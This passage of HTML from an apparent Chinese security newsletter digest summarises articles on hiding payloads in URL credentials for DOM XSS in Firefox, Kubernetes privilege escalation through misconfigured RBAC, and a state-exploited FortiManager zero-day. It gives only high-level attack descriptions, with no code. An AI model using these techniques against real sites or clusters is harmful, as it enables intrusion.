	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">URL凭证隐藏有效载荷，实现DOM XSS和DOM Clobbering攻击</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">URL凭证中的隐藏负载：利用URL凭证隐藏恶意代码</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAZpUhrMDlLtBWXbebJZ9cibAaQH3eQejjCFOboGCgHZdwPeMkJOviaHqQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAZpUhrMDlLtBWXbebJZ9cibAaQH3eQejjCFOboGCgHZdwPeMkJOviaHqQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121542441215284"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">URL 凭证部分的隐藏有效载荷：这是一种新型的攻击技术，可以在不显示在地址栏的情况下传输有效载荷，增加了攻击的隐蔽性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">document.URL</code> 和 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">location</code> 对象的差异：<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">document.URL</code> 包含 URL 的凭证部分，而 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">location</code> 对象不包含，这一差异为攻击者提供了获取有效载荷的途径。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Firefox 对单引号的处理：Firefox 不对 URL 凭证部分的单引号进行编码，这一特性可以被利用来进行 DOM XSS 攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">锚点元素的操纵：可以通过 URL 的凭证部分来控制锚点链接中的 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">username</code> 和 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">password</code> 属性，这可以通过 DOM 覆盖技术进一步扩展攻击面。</section></li></ul>
	<br/>
	<p>🏷️: URL, 凭证, Firefox, DOM, 有效载荷</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x10
			 Kubernetes权限提升攻击分析（第一部分）</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文讨论了Kubernetes环境中的权限提升攻击，包括账户操纵、有效账户的滥用以及系统Pod的潜在风险。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAG9lsxpLuLopENGYonZjwfX7vdBk9do8sSkYCKvoDQWmJgvSXZK6ibMQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAG9lsxpLuLopENGYonZjwfX7vdBk9do8sSkYCKvoDQWmJgvSXZK6ibMQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121542441288514"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Kubernetes权限提升是一种严重的安全威胁，攻击者可以通过多种手段实现，包括操纵账户、利用有效账户、滥用系统Pods等。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">基于角色的访问控制（RBAC）是Kubernetes安全机制的关键，但错误配置的RBAC角色和绑定可能会被攻击者利用来提升权限。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">系统Pods的错误配置为Kubernetes集群带来了潜在的安全风险，攻击者可能会利用这些Pods作为提升权限的跳板。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全控制应该是多层次的，包括预防和应对措施，以确保Kubernetes环境的安全。</section></li></ul>
	<br/>
	<p>🏷️: Kubernetes, 权限提升, 云安全, 容器安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x11
			 国家间谍利用FortiManager漏洞进行网络攻击</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页揭露了FortiNet产品中的FortiGate到FortiManager协议（FGFM）的零日漏洞，该漏洞被国家级攻击者利用进行间谍活动，且FortiNet未及时公开CVE信息和补丁。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAAD5geUTIAf8wKq4SMsLatgduYcicjUicNerkicXwtUOe2kibKkKdp96tHQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAAD5geUTIAf8wKq4SMsLatgduYcicjUicNerkicXwtUOe2kibKkKdp96tHQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858245411518111"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: 